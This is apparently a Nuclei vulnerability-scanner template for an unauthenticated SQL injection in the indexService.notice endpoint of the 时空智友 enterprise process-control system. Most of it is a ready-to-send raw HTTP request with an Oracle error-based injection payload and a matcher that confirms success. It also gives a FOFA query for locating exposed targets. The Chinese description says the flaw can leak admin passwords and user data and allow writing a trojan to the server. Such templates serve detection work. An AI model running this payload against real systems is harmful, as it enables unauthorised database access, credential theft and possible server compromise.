http:
    - matchers:
        - part: body
          type: word
          words:
            - qzpvq1qzvvq
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /formservice?service=indexService.notice HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
          Content-Type: application/json

          {"id":"1' AND 6448=CTXSYS.DRITHSX.SN(6448,(CHR(113)||CHR(122)||CHR(112)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (6448=6448) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(118)||CHR(113)))-- fKEk"}
id: shikongzhiyou-indexService_notice-sql
info:
    author: Superhero
    description: |-
        fofa: body="时空智友企业信息管理"
        时空智友企业流程化管控系统 indexService.notice 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 时空智友企业流程化管控系统 indexService.notice 存在SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/0Ssah295z17Keb4KSltXkQ
    severity: high
    tags:
        - Kong
        - 时空智友企业信息管理
